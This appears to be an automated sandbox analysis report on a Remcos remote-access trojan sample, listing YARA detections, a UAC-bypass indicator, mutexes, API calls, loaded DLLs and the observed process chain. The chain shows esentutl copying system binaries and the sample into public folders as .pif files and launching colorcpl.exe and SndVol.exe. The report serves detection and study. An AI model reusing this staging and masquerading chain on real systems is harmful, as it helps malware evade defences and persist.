Source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@20/10@10/3

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027D798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	8_2_027D798D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027D798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	11_2_027D798D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0281798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	13_2_0281798D

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029C7FD4 GetDiskFreeSpaceA,

0_2_029C7FD4

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027CF4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

8_2_027CF4AF

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029D6DC8 CoCreateInstance,

0_2_029D6DC8

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027DB539 FindResourceA,LoadResource,LockResource,SizeofResource,

8_2_027DB539

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027DAADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

8_2_027DAADB

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

File created: C:\Users\Public\Libraries\PNO

Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-X0H4I6
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5384:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2636:120:WilError_03

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: D2pQ4J4GGZ.exe	ReversingLabs: Detection: 60%
Source: D2pQ4J4GGZ.exe	Virustotal: Detection: 71%

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

File read: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\D2pQ4J4GGZ.exe "C:\Users\user\Desktop\D2pQ4J4GGZ.exe"
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hyfasrjV.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\D2pQ4J4GGZ.exe /d C:\\Users\\Public\\Libraries\\Vjrsafyh.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: unknown	Process created: C:\Users\Public\Libraries\Vjrsafyh.PIF "C:\Users\Public\Libraries\Vjrsafyh.PIF"
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: unknown	Process created: C:\Users\Public\Libraries\Vjrsafyh.PIF "C:\Users\Public\Libraries\Vjrsafyh.PIF"
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hyfasrjV.cmd" "	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\D2pQ4J4GGZ.exe /d C:\\Users\\Public\\Libraries\\Vjrsafyh.PIF /o	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe	Jump to behavior

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Section loaded: sppcext.dll	Jump to behavior
